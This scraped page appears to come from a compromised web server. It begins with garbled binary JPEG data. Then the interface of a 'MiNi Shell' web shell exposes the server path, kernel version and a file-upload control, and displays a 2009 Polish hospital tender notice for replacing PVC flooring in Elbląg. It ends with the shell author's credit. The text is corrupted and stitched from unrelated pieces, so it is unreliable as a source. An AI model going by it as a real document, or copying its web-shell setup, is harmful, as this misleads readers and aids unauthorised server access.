JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20090819/283780-N-2009.html

<p class="kh_header"><b>Elbląg: Wymiana posadzki z płytek PCV na posadzkę z wykładziny winylowej rulonowej</b><br>
<b>Numer ogłoszenia: 283780 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony w Elblągu , ul. Królewiecka 146, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. (055) 2344111, faks 055 2345547.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana posadzki z płytek PCV na posadzkę z wykładziny winylowej rulonowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  niniejszego postępowania  są roboty budowlane - wymiana posadzki z 
płytek PCV na posadzkę rulonową winylową (powierzchnia około 2500 m2)obiektach terminie 18 miesięcy w  obiektach Wojewódzkiego  Szpitala  Zespolonego w Elblągu ul. Królewiecka 146 zgodnie z warunkami zawartymi w Specyfikacji Istotnych Warunków Zamówienia.
Zakres robót  obejmuje  :
- demontaż starych płytek PCV z usunięciem gruzu i innych odpadów budowlanych do wyznaczonych kontenerów Zamawiającego na terenie szpitala 
- warstwy wyrównawcze o grubości 50 mm z wykonaniem izolacji przeciwwilgociowej z folii polietylenowej /zasadność wymiany warstw podkładowych zostanie określona przez Inwestora po dokonaniu oceny podłoża po demontażu istniejących płytek PCV/.    
- gruntowanie powierzchni podłoża  posadzki i  pod cokoły na ścianach                         
- wykonanie warstwy wygładzającej podłoża z zapraw/mas samopoziomujących   przeznaczonych do stosowania pod wykładziny z mechanicznym szlifowaniem, Wykonawca odpowiada za przygotowanie podłoża zgodnie z wymogami /instrukcją producenta wykładziny , zapewnia podłoże gładkie, odpowiedniej wytrzymałości, równe, suche, oczyszczone z wszelkich zanieczyszczeń.
- montaż na klej listew cokołowych PCV wyoblających na połączeniu posadzki z ścianami 
- dostawa i ułożenie wykładziny rulonowej z winylu - spełniającej wymagania określone w Załączniku nr 1A do SIWZ  z  cokołami /wywinięciem wykładziny na ścianę min. 13 cm/. 
- spawalniczych po uprzednim sfrezowaniu krawędzi, nadmiar zgrzewu do usunięcia po ostygnięciu .
- wszystkie zastosowane materiały do w/w robot dostarczone będą w ramach zamówienia przez Wykonawcę jako fabrycznie nowe , zgodnie z wymogami i  instrukcją Producenta dla danego typu wykładziny. 
- Zamawiający wymaga aby całość robót była wykonana wyłącznie siłami własnymi Wykonawcy (bez możliwości zatrudniania Podwykonawców)
UWAGA !
- Przedmiar ogólny robót stanowi Załącznik nr 2 do SIWZ
- Zamawiający wymaga od zainteresowanych Wykonawców przeprowadzenia wizji lokalnej potwierdzonej na piśmie (wzór wg Załącznika nr 7 do SIWZ) dla uzyskania wszystkich niezbędnych informacji - do potwierdzenia pobytu upoważniony jest Pan mgr inż. Michał Marciniak - Kierownik Działu Technicznego tel. 055-2395-696.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.51.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 7. Wymagania dotyczące wadium:	
7.1Oferta musi być zabezpieczona wadium w wysokości: 10 492,00 zł (słownie: dziesięć tysięcy czterysta dziewięćdziesiąt dwa złote, 00/100 grosze)
7.2. Wadium musi być wniesione przed upływem terminu składania ofert.
7.3 . Wadium może być wnoszone w jednej lub kilku następujących formach:
a)  pieniądzu  - wpłacone przelewem na  konto Wojewódzkiego Szpitala Zespolonego  w Elblągu - PKO BP S.A. Oddział w Elblągu Nr 76 1020 1752 0000 0602 0003 5063
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
	    kredytowej, z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z póź.zm.). 

7.4. Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: (Wadium - oznaczenie sprawy 67/2009 - wymiana posadzki). 
	
W pozostałych przypadkach (pkt 7.3 b, c, d) wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. 
Dokumenty, o których mowa w punkcie 7.3 muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.

7.5. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
7.6.  Zamawiający zwraca niezwłocznie wadium, jeżeli:
a)upłynął termin związania ofertą,
b)zawarto umowę w sprawie zamówienia publicznego 
c)Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
7.7.  Z zastrzeżeniem art. 46 ust 4a Ustawy Prawo zamówień publicznych Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a)który wycofał ofertę przed upływem terminu składania ofert,
b)który został wykluczony z postępowania,
c)którego oferta została odrzucona.
7.8.Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie ust. 2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
7.9.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.10 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie przedmiotowego zamówienia mogą ubiegać się jedynie Wykonawcy, którzy:
5.1 posiadają uprawnienia do wykonywania określonej działalności będącej przedmiotem niniejszego zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
5.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
5.3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5.4	nie podlegają wykluczeniu z postępowania u udzielenie zamówienia na podstawie art. 24 ust.1 i 2 Ustawy Prawo Zamówień Publicznych (tekst jednolity Dz. U. Nr 232 z dnia 20.11.2007 r. poz. 1655 z póź. zmianami) 
5.5	 wykażą wykonanie co najmniej 3 robót budowlanych odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj: polegających na wykonaniu robót budowlanych związanych z wykonywaniem lub remontem posadzki z ułożeniem wykładziny rulonowej PCV lub winylowej - każda o wymiarze równym lub większym 1500 m2. - w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Dla oceny spełnienia warunku Zamawiający weźmie pod uwagę wykaz wykonanych robót o których jest mowa powyżej z podaniem ich wartości oraz daty i miejsca wykonywania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie, co będzie stanowiło ocenę spełnienia warunku, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobowym zdolnym do wykonywania zamówienia. 
Przez dokumenty potwierdzające, że roboty budowlane zostały wykonane należycie Zamawiający rozumie dokumenty potwierdzające należyte wykonanie robót budowlanych - protokoły odbioru końcowego robót budowlanych, które jednocześnie potwierdzają dane zawarte w wykazie sporządzonym przez Wykonawcę tj. podaną ich wartość, przedmiot, daty wykonania i odbiorów - tabela Załącznik nr 5 do SIWZ.
5.6	Dysponują kierownikiem budowy branży budowlanej:
a)	posiadającym minimum 10-letnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień budowlanych
b)	będącym członkiem właściwej izby samorządu zawodowego.

Zamawiający dokona oceny spełniania ww warunków na podstawie dokumentów załączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty, jakie powinni dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawców oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605) oraz Rozporządzeniem Prezesa Rady Ministrów z dnia 16.10.2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form , w jakich te dokumenty mogą być składane (Dz.U. Nr 188, poz. 1155) oraz inne dokumenty i oświadczenia. 
Dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
6.1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych, Zamawiający żąda:
1. Aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do  rejestru lub  zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2. Aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego  oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń,  że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Oryginał oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych - wzór oświadczenia stanowi załącznik nr 4 do SIWZ.
4. Oryginał oświadczenia z art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - wzór oświadczenia stanowi Załącznik nr 3 do SIWZ
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 6.1. ppkt. 1, 2 - składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości Wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
6. Uprawnienia kierownika budowy/robót do pełnienia zawodowych funkcji technicznych w budownictwie wraz z aktualnym wpisem do właściwej izby samorządu zawodowego.

6.1.2 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się nie wydaje się dokumentów o których jest mowa w pkt. 6.1. ppkt .1, 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

      Ocena spełnienia tych warunków dokonana zostanie zgodnie z formułą (spełnia - nie spełnia), w oparciu o informacje zawarte w załączonych przez Wykonawcę do oferty ww dokumentach.
6.2. Ponadto oferta musi zawierać następujące dokumenty:
6.2.1 Wypełniony i podpisany formularz OFERTY wg Załącznika nr 1 do SIWZ.
6.2.2 Wypełnione i podpisane załączniki:
- Załącznik nr 1A do SIWZ -charakterystyka wykładzin 
- Oświadczenie Wykonawcy, że zapoznał się z warunkami przetargu zawartymi w   Specyfikacji Istotnych Warunków Zamówienia  w tym z kryterium oceny ofert oraz załącznikami do SIWZ oraz że przyjmuje je bez zastrzeżeń
- Oświadczenie Wykonawcy, że w przypadku wybrania jego oferty zobowiązuje się do podpisania umowy stanowiącej Załącznik Nr 6 do SIWZ zgodnie z treścią oferty.
6.2.3 Wykaz wszystkich dokumentów - spis zawartości złożonej oferty.
6.2.4 Dowód wniesienia wadium.
6.2.5 Załącznik nr 7 do SIWZ - dowód przeprowadzenia wizji lokalnej.
6.2.6 Oświadczenie, że wszystkie zaproponowane w ofercie materiały są fabrycznie nowe, jak również uwzględnieniem funkcji użytkowej jaką mają spełniać poszczególne pomieszczenia dopuszczone do stosowania w obiektach służby zdrowia (wraz z instrukcją konserwacji, utrzymania w czystości oraz zalecanymi środkami zabezpieczającymi.)
6.2.7 Zamawiający wymaga złożenia w OFERCIE ceny jako ryczałtowej wraz z kalkulacją wynagrodzenia ryczałtowego ( sporządzoną metodą uproszczoną z wymienionymi pozycjami robot wyszczególnionymi w przedmiarze(Załączniku nr 2 do SIWZ), jako elementy rozliczeniowe, za wyszczególnienie wszystkich kalkulowanych robót źródeł kosztów i za ustalenie ostateczne ilości robót odpowiada Wykonawca). Do sporządzenia oferty cenowej wykorzystać można jako materiał informacyjny przedstawione w SIWZ przedmiary wg Załącznika nr 2 do SIWZ, oraz własną ocenę zakresu i warunków realizacji robót.
6.3 W celu potwierdzenia, że oferowana wykładzina odpowiada wymaganiom określonym przez Zamawiającego, Zamawiający żąda:
- Dokument potwierdzający odporność mikrobiologiczną wykładziny.
- Atest higieniczny dopuszczający wykładziny do stosowania w szpitalach 
- Deklarację zgodności WE PN - EN 14041:2006
- Dokument potwierdzający klasyfikacje w zakresie odporności na ogień
- Certyfikat zgodności WE PN - EN 14041:2006
- aby każdy Wykonawca załączył do oferty próbkę oferowanej do zastosowania wykładziny o wymiarach 0,3 x 0,3 m oraz typowy aktualny próbnik oferowanych wykładzin.
  
6.4	 W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda  wykazu wykonanych okresie 5 lat robót budowlanych a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. (zgodnie z Załącznikiem nr 5 do SIWZ)
 
Uwaga! zgodnie z art. 96 ust. 4 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych Wykonawcy mają prawo zastrzegania nie później niż w terminie składania ofert, które informacje z treści oferty nie mogą być udostępniane.

W związku z powyższym Zamawiający ustanawia warunek, że:
a) nazwy dokumentów w ofercie, stanowiące informację zastrzeżoną, powinny 
    być w wykazie załączników graficznie wyróżnione,
b) dokumenty, stanowiące informacje zastrzeżone, winny być :
	- spięte i włożone w oddzielną, nieprzeźroczystą okładkę,
	- specjalnie opisane na okładce,
	- wewnątrz okładki winien być spis zawartości, podpisany przez Wykonawcę.
Zamawiający informuje, że zakaz udostępniania może dotyczyć tylko tych informacji, które stanowią tajemnicę przedsiębiorstwa (art. 11 ust. 4) w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.elblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zaopatrzenia i Zamówień Publicznych nr 072 (niski parter ) Wojewódzkiego Szpitala Zespolonego w Elblągu przy ul. Królewieckiej 146.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 10:00, miejsce: Sekretariat Wojewódzkiego Szpitala Zespolonego, 82-300 Elbląg ul. Królewiecka 146 (pok. 44 na parterze).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com